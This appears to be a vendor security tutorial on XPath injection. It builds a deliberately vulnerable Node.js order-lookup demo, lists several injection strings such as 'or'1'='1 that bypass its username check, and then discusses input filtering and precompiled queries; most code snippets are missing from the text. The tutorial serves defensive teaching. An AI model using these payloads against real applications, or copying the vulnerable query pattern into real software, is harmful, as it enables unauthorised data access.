When developers need to query an XML database, they use XML Path Language (XPath) to construct these queries. An XPath query searches the XML document to find nodes that match a specified pattern or have particular attributes. XML databases remain a common means of storing user data. When a user supplies their login ID and password, they trigger the preconfigured XPath query, which searches the database for the matching credentials and supplies access if the provided combination exists.
However, the ability to trigger an XPath query via user-supplied information introduces the risk of XPath injection attacks. These attacks occur when specially constructed XPath queries gain access to the XML data structure. Malicious actors can take advantage of user input fields to inject arbitrary XPath code that can access or modify the XML document data. This means that, even if the attacker cannot retrieve passwords (if the database only contains password hash values), they can still use the discovered XML structure to cause additional harm.
In this article, you’ll view some example code to discover how XPath injection attacks work and learn some best practices for preventing and mitigating them.
The risks of XPath injection
XPath injection attacks are one of the most prevalent and dangerous web application vulnerabilities. A successful attack can have several potential consequences, including:
- Access to and exfiltration of sensitive data or personally identifiable information (PII).
- Deletion, modification, or corruption of crucial business data.
- Gaining root access to a system and performing actions that compromise system integrity.
- Distribution of malware or other malicious code to internal and external users.
The consequences of such attacks can ruin the reputation of your application and your users. Therefore, you need to be conscious of the risks associated with XPath injection attacks and take the necessary measures to mitigate them. In the next section, you’ll examine a sample XPath injection attack to learn how to best defend against them.
How XPath injection works
This section reviews how XPath queries work, provides a hands-on demonstration of an XPath injection attack, and how to mitigate or prevent these attacks.
How XPath queries work
Imagine an application that enables users to search for items in an XML file. To enable this function, the application uses the following expression:
In this query, the user-supplied string replaces the
variable. The query then searches the XML document for all text strings that match this input. When it executes, the application will work as expected.However, this type of query is vulnerable to attackers who can enter malicious XPath code that allows them to bypass the XML document hierarchy. Consequently, they may access or even modify the XML data in unforeseen and dangerous ways.
For example, the knowledgeable attacker can use the user input form to inject the following XPath code into the query’s
variable:
As a result, the application constructs and executes the following XPath query:
A query of this type would match all nodes in an XML document, and depending on the program, might allow the attacker to access and modify any data the document contains.
Additionally, an attacker can ascertain an XML document’s structure, which can potentially enable them to navigate among several layers of the contained data. When this type of access is the goal, malicious actors tend to use one of the following two XPath injection methods:
- Booleanization: Boolean queries will generate different behaviors depending on whether they resolve into or conditions. An attacker could inject a Boolean query that returns true if a login request is successful and if the login fails. This allows the attacker to retrieve a single bit of information (success or failure) with each query. Repeating this process enables an attacker to gain insight into the contents of the XML document.
- XML crawling: Attackers can inject specially crafted queries that enable them to discover the structure of an XML document. These queries allow the attacker to “crawl” through an XML document without knowing its structure beforehand. By repeatedly sending such queries to the XML document and examining the responses, the attacker can gradually discover the structure of the document and the elements it contains. Eventually, they can piece together the gathered information to reconstruct the entire document. This approach can be an effective means for discovering sensitive information or exploitable vulnerabilities in the document structure.
Sample XPath injection vulnerabilities
To see how XPath injections emerge and function, you’ll create a demo application vulnerable to these attacks. You’ll create a demo application that checks the user-supplied input to return data from an XML document.
Say you’re working with an e-commerce platform and that you maintain a list of your customers (users), each of which is identified using a username. To connect your orders with their purchasers, you use an application to search for the username to return the orders they are associated with, as listed on the order status page.
Below is an XML data construct called
, which will represent this scenario.
You’ll use JavaScript to execute the above data and create a basic application that allows users to query the data using inputs they supply.
In the same directory, run the following command to initialize Node.js, a JavaScript runtime:
Then, you’ll need to use need the following to execute XML. Note that they’re both included in Node.js:
XPath—For DOM implementation and helper for JavaScript that supports XPath query strings
XMLDOM—For JavaScript implementation of DOM for Node.js that supports the XML Parser interface
Open a terminal to your app directory and run the following command:
In the same directory, create an
file and execute the XML data as follows:First, import the required dependencies:
Then, create a simple readline module to allow user-supplied inputs:
Create a function to execute XML query and return data from the input using the code below:
In the above example, the query
will be executed. The order elements are children of orders with a username element, where the value is equal to the variable supplied in the user input.specifies a predicate condition that must be satisfied by the selected elements. In this case, the predicate specifies that the username element must have a value equal to the value of the order variable.
This way, the order element is selected as a child of the orders element that satisfies the predicate. Now run the following command to execute this program:
This will allow you to enter the username, just like a user would have used a search-supplied input.
Enter a username in your
file, as shown below. This should display the associated order. Otherwise, a “User does not exist” message will be displayed if the username doesn’t exist.
Exploring XPath injection vulnerabilities
This application is working as it should. However, an attacker with malicious intentions can run arbitrary XPath queries using the supplied user input to get access without needing a valid username.
The application is vulnerable to malicious code injection. The predicate
is the target for the attacker here. An attacker can construct a query that evaluates this expression to satisfy its condition. Using the injected code, the query will evaluate to true and allows the attacker to gain access without supplying the correct username.Here are some arbitrary queries that can allow attackers to maneuver around the data hierarchy using the user-supplied input:
- 'or'1'='1
- text' or '1' = '1
- ' or 1=1 or 'a'='a
- ' or ''='
- a' or true() or '
Here is how to execute all of the above arbitrary queries using
as the example:
Mitigating XPath injections
As you can see in the example above, properly constructed injections mean that an attacker can too easily access restricted data. So, this section explores how you can patch common vulnerabilities and mitigate the risks associated with XPath injections.
This attack takes advantage of a lack of proper variable parameter binding in the application’s code. The application concatenates user-supplied input directly into an XPath query without adequately validating or sanitizing the input. This is where the attacker can insert malicious XPath statements into the query to access sensitive information from the XML database.
To mitigate this, the best strategy is to use parameter binding to prevent injection. To accomplish this, you can use a regular expression that removes any characters that are not letters or numbers. This method prevents potential attackers from constructing arbitrary queries.
To sanitize and prevent XPath injection vulnerabilities in this example, use the following code:
The above code uses regex to detect and filter non-alphanumeric characters. If the supplied input has such characters, the application will stop any further execution and provide the message, “Invalid characters not allowed.” However, if the input passes this test, the application will proceed and execute the query with the supplied input. You can test the code with the arbitrary queries discussed in the section above.
Although you can sanitize user inputs, an attacker could still use other techniques to bypass this filter.
It’s virtually impossible to escape all potentially exploitable characters using regex expressions. In cases like user authentication, the application requires users to provide passwords that may contain such characters. This means that sanitizing user inputs is not wholly reliable.
Another alternative is to use parameterized XPath queries, as shown below:
However, this approach contains a dynamic XPath expression constructed using string interpolation, which can also be constructed from user-supplied data. Therefore, this method may not be sufficient to fully protect against XPath injection.
Using precompiled XPath queries
You can use a precompiled XPath query to avoid dynamic XPath expression. This is achieved by defining the XPath expression as a separate variable and then passing it when it is needed.
The precompiled XPath query uses a variable to represent the user-provided input. This ensures they aren't constructed from user-supplied data. Thus, an attacker cannot run any arbitrary code to gain access. Here is an example of how to use a precompiled XPath query:
This helps ensure that user-supplied input is treated as separate from the XPath query rather than as part of the query itself.
Conclusion
You have now learned some common strategies for executing XPath injection attacks and gained insight into their potential consequences. Fortunately, you also discovered some ways to mitigate the risks.
However, your application may still be vulnerable to XPath injection even after implementing the security measures you explored. To maximize application security, turning to tools like Web Application Firewalls (WAFs) or Web Application and API Protection (WAAP) can fill in the gaps that coding best practices may not address. Visit Trend Micro today to begin assessing your app’s security posture.